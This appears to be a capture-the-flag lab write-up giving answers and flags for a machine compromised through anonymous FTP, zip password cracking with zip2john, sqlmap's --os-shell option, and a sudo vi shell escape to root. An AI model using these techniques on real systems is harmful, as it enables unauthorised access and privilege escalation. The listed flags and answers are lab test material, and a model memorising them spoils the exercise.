IP = 10.129.51.57

## Task 1 -  Besides SSH and HTTP, what other service is hosted on this box? 
	ftp
## Task 2 -  This service can be configured to allow login with any password for specific username. What is that username? 
	anonymous
## Task 3 -  What is the name of the file downloaded over this service? 
	backup.zip
## Task 4 -  What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? 
	zip2john
```bash
zip2john backup.zip > zip.hashes
john zip.hashes
```
## Task 5 -  What is the password for the admin user on the website? 
	qwerty789
## Task 6 -  What option can be passed to sqlmap to try to get command execution via the sql injection? 
	--os-shell
## Task 7 -  What program can the postgres user run as root using sudo? 
	vi
## Task 8 -  Submit user flag 
	ec9b13ca4d6229cd5cc1e09980965bf7
## Task 9 -  Submit root flag 
	dd6e058e814260bc70e9bbdef2715849

```bash
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
```
## Exploit within Vi:
```bash
:set shell=/bin/sh
:shell
```


P@s5w0rd!